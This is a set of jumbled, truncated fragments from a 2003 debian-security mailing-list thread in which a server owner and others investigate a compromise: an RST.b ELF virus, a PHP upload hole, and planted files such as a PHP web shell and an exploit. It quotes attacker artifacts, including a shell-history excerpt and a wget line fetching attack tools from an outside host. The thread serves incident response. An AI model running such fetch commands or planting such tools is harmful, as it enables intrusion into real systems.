On 2003-09-19 08:47:35, Michel Messerschmidt wrote:
>On Thu, Sep 18, 2003 at 07:20:08PM +0200, Javier Fernández-Sanguino Peña wrote:
>Be careful!
>These files are really infected and will infect other ELF binaries if
>you execute them (and if user rights allow it).
>I've done replication tests
Diego Brouard wrote:
On Wednesday, 17 September 2003 21:29, Markus Schabel
wrote:
Hello!
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip
segfaulted. I've copied gzip from another server over the version
on
On Fri, Sep 19, 2003 at 08:47:35AM +0200, Michel Messerschmidt wrote:
>
> Be careful!
> These files are really infected and will infect other ELF binaries if
> you execute them (and if user rights allow it).
I didn't run them, just used 'strings'.
> PS: Non-viral malware is usually reported diffe
On Thu, Sep 18, 2003 at 07:20:08PM +0200, Javier Fernández-Sanguino Peña wrote:
> > www.slacks.hpg.ig.com.br/bin/rh Infection: Unix/Osf.A
>
> This is an exploit for an OpenSSL bug.
>
> > www.slacks.hpg.ig.com.br/bin/mass Infection: Unix/Osf.A
>
> This is a 'massive' scanner
>
> > www.slacks.hp
rm -rf phpshell.php
^__^
was this the exploited hole?
I think so. In fact the problem is that it got there...
probably uploaded somehow...
an upload form, some web script maybe?
check PHP permissions, I'd say.
where was enr php-file located? do you know?
good luck, Jst
On Thu, Sep 18, 2003 at 07:02:06PM +0200, Michel Messerschmidt wrote:
>
> Might be a side effect of the tools that were used.
> A quick scan with f-prot shows several infected files on the server
> www.slacks.hpg.ig.com.br:
()
> www.slacks.hpg.ig.com.br/bin/rh Infection: Unix/Osf.A
This is
Diego Brouard writes:
As you've seen you have been cracked by a "worm", it's called
RST.b.
In a few words, it infects executable files in /bin and in the current directory
from where you are executing an already infected binary. You were infected
because of a php bug and the ptrace bug.
Might
On Wed, Sep 17, 2003 at 11:52:36PM +0200, Laurent Corbes {Caf'} wrote:
>
> I'm thinking about a hardware problem.
> Maybe the hard drive is failing (get the output of dmesg) or a very big
> RAM problem that corrupts files on the hard drive.
By the sound of things, this is starting to sound more li
On Wednesday, 17 September 2003 21:29, Markus Schabel wrote:
> Hello!
>
> I've seen some strange things on my (stable with security-updates)
> server: the last apt-get update didn't work because gzip segfaulted.
> I've copied gzip from another server over the version on this server,
> but
>> - perl without tainting checks in cgi-bin?
>
>what exactly do you mean? how can i do/check that?
>
Use '#!/usr/local/bin/perl -T' at the beginning of a Perl CGI.
Probably it would end in some 'tainted' errors you have to solve.
For further details, look into 'man perlsec'.
Christian
On Thu, Sep 18, 2003 at 03:02:04PM +0200, Markus Schabel wrote:
> Christian Storch wrote:
> >- security updates all up to date?
>
> the same state as DSA announcements
Including your kernel?
> >- known unclosed security hole?
>
> It seems that it was possible to upload & execute .php-files som
On Thu, Sep 18, 2003 at 09:03:12AM +0200, Markus Schabel wrote:
> in the directory /var/www/cncmap/www/upload/renegade there are the
> following files: backhole.pl
> e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003,
> LES-EXPLOIT for Linux x86")
> rem.php (phpRemoteView)
>
> s
eck your scripts. It's quite easy to
open such security holes - be careful with fileuploads.
Stefan
> > -Original Message-
> > From: Markus Schabel [mailto:[EMAIL PROTECTED]
> > Sent: Thursday, September 18, 2003 12:23 PM
> > To: debian-security@lists.d
can I do/check that?
thanks, markus
etc.
etc.
Christian
-Original Message-
From: Markus Schabel [mailto:[EMAIL PROTECTED]
Sent: Thursday, September 18, 2003 12:23 PM
To: debian-security@lists.debian.org
Subject: Re: [sec] Re: Strange segmentation faults and Zombies
maximilian attems wrot
Phillip Hofmeister wrote:
On Thu, 18 Sep 2003 at 09:08:28AM +0200, Markus Schabel wrote:
scp goodserver:/bin/gzip /bin/gzip
NO! Since there's the chance that the server got hacked, I'm not
interested in giving it other passwords. Copied from the other server
via scp.
scp from the clean syste
On Thu, 18 Sep 2003 at 09:08:28AM +0200, Markus Schabel wrote:
> >scp goodserver:/bin/gzip /bin/gzip
> NO! Since there's the chance that the server got hacked, I'm not
> interested in giving it other passwords. Copied from the other server
> via scp.
scp from the clean system into the dirty one. Th
ting checks in cgi-bin?
etc.
etc.
Christian
-Original Message-
From: Markus Schabel [mailto:[EMAIL PROTECTED]
Sent: Thursday, September 18, 2003 12:23 PM
To: debian-security@lists.debian.org
Subject: Re: [sec] Re: Strange segmentation faults and Zombies
maximilian attems wrote:
>
On Thu, Sep 18, 2003 at 09:03:12AM +0200, Markus Schabel wrote:
> >wget www.slacks.hpg.com.br/bin/dos
That directory www.slacks.hpg.com.br/bin/ also contains some
'interesting' files :-) Some exploits, rootkits etc.
Jan
maximilian attems wrote:
On Thu, 18 Sep 2003, Christian Storch wrote:
Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.
[..]
in /etc/.rpn there's a .bash_history with the following content:
id
mkdir /etc/.rpn
ps -aux
ps -aux | grep tbk
kill -1
On Thu, 18 Sep 2003, Christian Storch wrote:
> Don't forget to try to find the potential hole first!
> Otherwise you could have a fast recurrence.
> [..]
> > > in /etc/.rpn there's a .bash_history with the following content:
> > > >id
> > > >mkdir /etc/.rpn
> > > >ps -aux
> > > >ps -aux | grep tbk
Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.
Christian
- Original Message -
From: "Josh Carroll" <[EMAIL PROTECTED]>
To:
Sent: Thursday, September 18, 2003 9:12 AM
Subject: Re: Strange segmentation faults and Zo
Back up /etc and any other data you have, and you can reference your
configuration files later
during your re-install.
At this point, re-installation is a must. Never delude yourself into thinking
you can 'recover'
from being rooted. Sure, you might be able to do so after a lot of effort/etc,
bu
Ralf Dreibrodt wrote:
Hi,
Markus Schabel wrote:
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaulted.
I've copied gzip from another server over the version on this server,
but it also crashed. Interesting was tha
Laurent Corbes {Caf'} wrote:
On Wed, 17 Sep 2003 22:29:58 +0200
Markus Schabel <[EMAIL PROTECTED]> wrote:
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaulted.
I've copied gzip from another server over the versio
Hi,
Markus Schabel wrote:
>
> I've seen some strange things on my (stable with security-updates)
> server: the last apt-get update didn't work because gzip segfaulted.
> I've copied gzip from another server over the version on this server,
> but it also crashed. Interesting was that the executabl
On Wed, 17 Sep 2003 22:29:58 +0200
Markus Schabel <[EMAIL PROTECTED]> wrote:
> I've seen some strange things on my (stable with security-updates)
> server: the last apt-get update didn't work because gzip segfaulted.
> I've copied gzip from another server over the version on this server,
> but it
Hello!
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaulted.
I've copied gzip from another server over the version on this server,
but it also crashed. Interesting was that the executable was bigger
after the segfau
54 matches